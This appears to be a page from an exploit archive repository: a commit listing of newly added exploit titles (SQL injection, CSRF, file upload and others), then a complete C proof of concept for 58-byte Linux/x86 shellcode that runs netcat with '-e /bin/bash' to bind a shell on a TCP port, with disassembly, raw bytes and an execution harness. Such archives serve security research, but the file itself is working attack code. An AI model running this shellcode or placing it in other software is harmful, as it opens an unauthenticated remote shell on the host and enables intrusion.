3a7153b2ac
24 changes to exploits/shellcodes CuteFTP Mac 3.1 - Denial of Service (PoC) Evince 3.24.0 - Command Injection Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode) xorg-x11-server < 1.20.1 - Local Privilege Escalation Data Center Audit 2.6.2 - 'username' SQL Injection Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal Paroiciel 11.20 - 'tRecIdListe' SQL Injection Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting Paroiciel 11.20 - 'tRecIdListe' SQL Injection The Don 1.0.1 - 'login' SQL Injection Facturation System 1.0 - 'modid' SQL Injection The Don 1.0.1 - 'login' SQL Injection Facturation System 1.0 - 'modid' SQL Injection GPS Tracking System 2.12 - 'username' SQL Injection ServerZilla 1.0 - 'email' SQL Injection GPS Tracking System 2.12 - 'username' SQL Injection ServerZilla 1.0 - 'email' SQL Injection Nominas 0.27 - 'username' SQL Injection CentOS Web Panel 0.9.8.740 - Cross-Site Request Forgery / Cross-Site Scripting Surreal ToDo 0.6.1.2 - SQL Injection Surreal ToDo 0.6.1.2 - Local File Inclusion Alienor Web Libre 2.0 - SQL Injection Musicco 2.0.0 - Arbitrary Directory Download Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin) Tina4 Stack 1.0.3 - SQL Injection / Database File Download Tina4 Stack 1.0.3 - Cross-Site Request Forgery (Update Admin) Easyndexer 1.0 - Arbitrary File Download ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin) Gumbo CMS 0.99 - SQL Injection Silurus Classifieds Script 2.0 - 'wcategory' SQL Injection ClipperCMS 1.3.3 - Cross-Site Request Forgery (File Upload) Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin) Webiness Inventory 2.3 - SQL Injection SIPve 0.0.2-R19 - SQL Injection Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)
55 lines
No EOL
2 KiB
C
55 lines
No EOL
2 KiB
C
/*
|
|
# Exploit Title: Linux/x86 - execve /bin/nc -lp99999 -e /bin/bash shellcode (58 bytes)
|
|
# Exploit Description: Binds a TCP bash shell at port 99999 using netcat. Note: This shellcode uses netcat-traditional package. Otherwise, it will not work.
|
|
# Date: 04/11/2018
|
|
# Exploit Author: Javier Tello <jtelloal@gmail.com>
|
|
# Version: 1.0
|
|
# Tested on: i686 GNU/Linux
|
|
# Shellcode Length: 58 Bytes
|
|
|
|
|
|
Disassembly of section .text:
|
|
|
|
08048060 <_start>:
|
|
8048060: 31 c0 xor %eax,%eax
|
|
8048062: 50 push %eax
|
|
8048063: 68 6e 2f 6e 63 push $0x636e2f6e
|
|
8048068: 68 2f 2f 62 69 push $0x69622f2f
|
|
804806d: 89 e3 mov %esp,%ebx
|
|
804806f: 50 push %eax
|
|
8048070: 68 62 61 73 68 push $0x68736162
|
|
8048075: 68 62 69 6e 2f push $0x2f6e6962
|
|
804807a: 68 2d 65 2f 2f push $0x2f2f652d
|
|
804807f: 89 e2 mov %esp,%edx
|
|
8048081: 50 push %eax
|
|
8048082: 68 39 39 39 39 push $0x39393939
|
|
8048087: 68 2d 6c 70 39 push $0x39706c2d
|
|
804808c: 89 e6 mov %esp,%esi
|
|
804808e: 50 push %eax
|
|
804808f: 52 push %edx
|
|
8048090: 56 push %esi
|
|
8048091: 53 push %ebx
|
|
8048092: 89 e1 mov %esp,%ecx
|
|
8048094: 89 c2 mov %eax,%edx
|
|
8048096: b0 0b mov $0xb,%al
|
|
8048098: cd 80 int $0x80
|
|
|
|
===============poc by Javier Tello=========================
|
|
*/
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = \
|
|
|
|
"\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2d\x65\x2f\x2f\x89\xe2\x50\x68\x39\x39\x39\x39\x68\x2d\x6c\x70\x39\x89\xe6\x50\x52\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
|
|
|
|
main() {
|
|
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
|
|
} |